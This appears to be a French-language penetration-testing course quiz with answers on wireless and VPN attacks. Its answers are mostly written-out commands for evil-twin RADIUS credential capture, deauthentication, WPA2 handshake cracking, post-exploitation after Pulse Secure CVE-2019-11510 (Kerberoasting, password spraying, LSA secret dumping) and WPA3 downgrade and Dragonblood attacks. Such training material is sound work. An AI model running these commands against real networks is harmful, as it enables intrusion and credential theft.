Chapitre 3.4 Quiz - Techniques d'attaque sans fil et VPN
Mode Quiz - Toutes les reponses sont masquees. Tentez chaque question avant de reveler la reponse.
Question 1
Vous executez airodump-ng wlan0mon et observez un reseau d'entreprise CorpNet avec WPA2-Enterprise (AUTH: MGT) sans aucun client connecte actuellement. Vous ne pouvez pas attendre des heures un client. Decrivez le chemin d'attaque qui peut tout de meme produire des identifiants crackables sans qu'aucun client soit present.
Reveler la reponse
Reponse : Deployer un point d'acces escroc (evil twin) avec hostapd-wpe ou eaphammer pour intercepter l'authentification EAP lorsque les clients se connectent.
Plus specifiquement pour WPA2-Enterprise sans clients :
L'attaque correcte est un evil twin RADIUS escroc - vous n'avez pas besoin de clients existants captures ; vous attendez qu'ils arrivent et s'authentifient a votre point d'acces plutot qu'au veritable.
# Etape 1 : Configurer eaphammer correspondant au reseau enterprise cible
python3 eaphammer \\
-i wlan0 \\
--channel 6 \\
--auth wpa-eap \\
--essid "CorpNet" \\\\ # Correspondance exacte du SSID
--negotiate gtc-downgrade \\\\ # Tenter de forcer EAP-GTC (texte clair)
--creds # Capturer les identifiants
# Etape 2 : Si la degradation GTC echoue, revenir a la capture PEAP/MSCHAPv2
python3 eaphammer \\
-i wlan0 \\
--channel 6 \\
--auth wpa-eap \\
--essid "CorpNet" \\
--creds
# Capture le challenge/reponse MSCHAPv2 quand le client se connecte
# Etape 3 : Desauthentifier les clients du vrai AP pour forcer la rea-association
aireplay-ng wlan0mon \\
--deauth 0 \\\\ # Continu
-a <real_AP_BSSID> # Cibler le vrai AP
# Etape 4 : Cracker le MSCHAPv2 capture
asleap \\
-C <challenge> \\
-R <response> \\
-W /usr/share/wordlists/rockyou.txt
Controle defensif cle vaincu par cette attaque : Les clients qui ne valident pas le certificat du serveur RADIUS (sans ca_cert dans wpa_supplicant.conf) s'authentifieront a n'importe quel serveur RADIUS, y compris un serveur escroc. La correction est une validation stricte des certificats avec epinglage du sujet.
MITRE ATT&CK : T1557.004 (Adversaire au milieu : Wi-Fi), T1465 (Point d'acces Wi-Fi escroc)
Question 2
Un testeur d'intrusion capture une poignee de main a 4 voies pour un reseau WPA2-PSK nomme HomeNetwork_5G. Apres 12 heures de crackage avec rockyou.txt et les regles best64, aucun resultat. Le routeur du client a ete achete en 2021 aupres d'un grand FAI. Quelles deux strategies de crackage alternatives devraient etre essayees ensuite, et pourquoi sont-elles appropriees pour ce scenario specifique ?
Reveler la reponse
Reponse :
Strategie 1 : Attaque par masque sur le mot de passe par defaut du FAI
La plupart des FAI livrent les routeurs avec un mot de passe par defaut imprime sur une etiquette - generalement un modele de longueur fixe de chiffres, alphanumeriques, ou une combinaison mot du dictionnaire + chiffres. Ces modeles sont bien documentes et facilement masquables :
# Formats par defaut courants des FAI :
# 8 minuscules + 4 chiffres (nombreux FAI britanniques/europeens)
hashcat -m 22000 handshake.hc22000 \\
-a 3 "?l?l?l?l?l?l?l?l?d?d?d?d"
# 10 chiffres (certains FAI cable americains)
hashcat -m 22000 handshake.hc22000 \\
-a 3 "?d?d?d?d?d?d?d?d?d?d"
# Modele base sur le numero de serie : lettres + chiffres (ex. "ARRIS" + 8 chars hex)
hashcat -m 22000 handshake.hc22000 \\
-a 3 "?u?u?u?u?l?l?d?d?d?d"
# Hybride : mot de marque FAI + chiffres
hashcat -m 22000 handshake.hc22000 \\
-a 6 /tmp/isp_words.txt "?d?d?d?d?d?d?d?d"
# Mot de passe base sur le SSID (tres courant) : le routeur utilise le suffixe SSID comme graine
echo "HomeNetwork5G" | hashcat -m 22000 handshake.hc22000 --stdin
Strategie 2 : Generation de mot de passe par defaut base sur le BSSID
De nombreux modeles de routeurs generent leur mot de passe Wi-Fi par defaut de maniere algorithmique a partir du BSSID (adresse MAC). Des outils comme routersploit et des generateurs de listes de mots dedies exploitent cela :
# Extraire le BSSID de la capture
hcxpcapngtool --info=stdout handshake.hc22000 | grep "BSSID"
# ex. BSSID = AA:BB:CC:DD:EE:FF
# RouterKeygen - genere les cles par defaut pour les modeles de routeurs courants
# base sur le BSSID, le SSID et les algorithmes specifiques aux modeles
python3 routerkeygen.py \\
--bssid AA:BB:CC:DD:EE:FF \\
--ssid "HomeNetwork_5G"
# Identifier le fabricant du routeur depuis l'OUI du BSSID (3 premiers octets)
# Connaitre "ARRIS", "Technicolor", "Sagemcom" etc. permet de cibler l'algorithme de cle par defaut
Pourquoi ces strategies sont appropriees : rockyou.txt echoue parce que les mots de passe par defaut des FAI ne sont pas des mots de passe humains courants - ce sont des chaines generees algorithmiquement qui n'apparaissent pas dans les bases de donnees de violations. La date d'achat en 2021 et la nature fournie par le FAI suggerent fortement que le mot de passe de l'etiquette par defaut est encore utilise.
MITRE ATT&CK : T1110.002 (Force brute : crackage de mot de passe)
Question 3
Lors d'un test d'intrusion externe, vous identifiez que la passerelle VPN de la cible fonctionne sous Pulse Secure version 9.0R1. CVE-2019-11510 est confirme exploitable. Apres lecture du fichier de session, vous trouvez un couple nom d'utilisateur/mot de passe. Decrivez les trois etapes suivantes pour passer de cet identifiant a un acces au domaine.
Reveler la reponse
Reponse :
Etape 1 - S'authentifier au VPN avec les identifiants obtenus
# Utiliser les identifiants extraits pour etablir une session VPN legitime
# La traversee de chemin nous a donne : username=jsmith, password=P@ssw0rd123
# Se connecter via OpenConnect (client Pulse Secure open-source)
openconnect \\
--protocol=pulse \\\\ # Protocole Pulse Secure
--user=jsmith \\
vpn.target-corp.com
# Saisir le mot de passe a l'invite
Etape 2 - Etablir la connectivite reseau et enumerer le reseau interne
Une fois la session VPN etablie, vous avez un chemin route vers le reseau d'entreprise :
# Verifier quelles routes ont ete poussees par le VPN
ip route show # Quels sous-reseaux sont maintenant accessibles ?
cat /etc/resolv.conf # Quel serveur DNS interne a ete attribue ?
# Decouvrir les hotes actifs dans la plage interne
nmap -sn 10.0.0.0/8 --min-rate 500 # Balayage ping
# Enumerer le DNS interne - obtenir une carte des hotes gratuitement
dig axfr @<internal_dns_ip> corp.local # Tentative de transfert de zone
# Ou recherche inverse dans la plage DC :
for i in $(seq 1 254); do
host 10.0.1.$i <internal_dns_ip> 2>/dev/null | grep "domain name pointer"
done
# Trouver le Controleur de domaine
nmap -p 88,389,445,636 10.0.0.0/24 --open # Kerberos + LDAP + SMB = DC
Etape 3 - Utiliser les identifiants pour l'authentification AD et le mouvement lateral
# Les identifiants VPN sont probablement aussi des identifiants de domaine - les tester directement
cme smb 10.0.1.0/24 \\
-u jsmith \\
-p 'P@ssw0rd123' \\
-d CORP \\
--continue-on-success
# Si les identifiants de domaine sont confirmes - enumerer AD
impacket-GetUserSPNs \\
"CORP/jsmith:P@ssw0rd123@10.0.1.10" \\\\ # IP du DC
-dc-ip 10.0.1.10 \\
-request # Kerberoaster immediatement tous les SPN
# Enumerer tous les utilisateurs AD pour l'AS-REP roasting
impacket-GetNPUsers \\
"CORP/jsmith:P@ssw0rd123" \\
-dc-ip 10.0.1.10 \\
-format hashcat
# Verifier si jsmith a des droits admin local quelque part
cme smb 10.0.0.0/24 -u jsmith -p 'P@ssw0rd123' -d CORP
# Extraire LSASS sur tout hote ou jsmith est admin local
cme smb 10.0.1.50 \\
-u jsmith -p 'P@ssw0rd123' -d CORP \\
--lsa # Extraire les secrets LSA
MITRE ATT&CK : T1190 (Exploiter une application publique : CVE-2019-11510), T1078 (Comptes valides), T1021.002 (Services distants : SMB)
Question 4
Un ingenieur en securite declare : "Nous utilisons WPA3 partout, nous sommes donc proteges contre les attaques de vol d'identifiants Wi-Fi." Identifiez trois conditions specifiques dans lesquelles les deploiements WPA3 restent vulnerables au compromis des identifiants ou des sessions, avec le mecanisme technique pour chacune.
Reveler la reponse
Reponse :
Condition 1 : Mode de transition WPA3 (mixte WPA2/WPA3)
La plupart des deploiements WPA3 fonctionnent en mode de transition pour supporter les clients legacy. Le point d'acces annonce a la fois WPA3-SAE et WPA2-PSK. Un attaquant configure un evil twin n'annoncant que WPA2, et les clients WPA3 capables qui n'ont pas active WPA3 obligatoire se degraderont et se connecteront avec WPA2.
# Verifier le mode de transition
airodump-ng wlan0mon | grep "SAE+PSK" # Indicateur de mode de transition
# Deployer un evil twin WPA2 uniquement avec le meme SSID
# Le client se degrade - poignee de main a 4 voies capturee - crackage hors ligne possible
# (Annule completement la resistance au crackage hors ligne de SAE)
Condition 2 : Attaques par canal lateral Dragonblood (CVE-2019-9494)
Les modeles de timing et d'acces au cache de la poignee de main SAE Dragonfly pendant l'algorithme hunting-and-pecking varient selon le mot de passe. Un attaquant effectuant de nombreuses interactions SAE et mesurant les temps de reponse peut construire un oracle qui reduit significativement l'espace de recherche de la phrase de passe.
python3 dragonslayer.py \\
--bssid AA:BB:CC:DD:EE:FF \\
--ssid "WPA3Network" \\
-i wlan0mon \\
--attack timing # Oracle de timing - reduit la complexite du crackage
# Apres collecte de milliers d'echantillons de timing, des bits partiels de la phrase de passe sont recuperes
# Combine avec une liste de mots ciblee - faisable contre les phrases de passe faibles
Condition 3 : WPA3-Enterprise sans validation correcte des certificats
WPA3-Enterprise utilise toujours EAP (PEAP/MSCHAPv2 ou EAP-TLS) pour l'authentification des utilisateurs. Si le supplicant client ne valide pas le certificat du serveur RADIUS, une attaque par point d'acces escroc est identique au cas WPA2-Enterprise - la couche SAE protege l'echange de cles mais pas l'authentification EAP a l'interieur.
# Le serveur RADIUS escroc fonctionne toujours si ca_cert n'est pas configure
python3 eaphammer \\
-i wlan0 \\
--auth wpa3-eap \\\\ # Mode WPA3-Enterprise
--essid "SecureCorpWPA3" \\
--creds
# Si le client n'a pas de ca_cert epingle - MSCHAPv2 capture - crackable
# WPA3 au niveau L2 ne compense pas l'absence de validation de certificat au niveau L7
Tableau de synthese :
| Condition | Fonctionnalite WPA3 contournee | Mecanisme |
|---|---|---|
| Mode de transition | Resistance au crackage hors ligne SAE | Degradation vers WPA2 ; poignee de main a 4 voies capturable |
| Timing Dragonblood | Resistance a la force brute SAE | Oracle de timing reduit l'espace de recherche |
| Pas de validation de certificat | Securite de session EAP | RADIUS escroc capture MSCHAPv2 quel que soit SAE |
MITRE ATT&CK : T1557.004, T1465 (Wi-Fi escroc), T1110.002 (Crackage de mot de passe)
Fin du Quiz 3.4 - Techniques d'attaque sans fil et VPN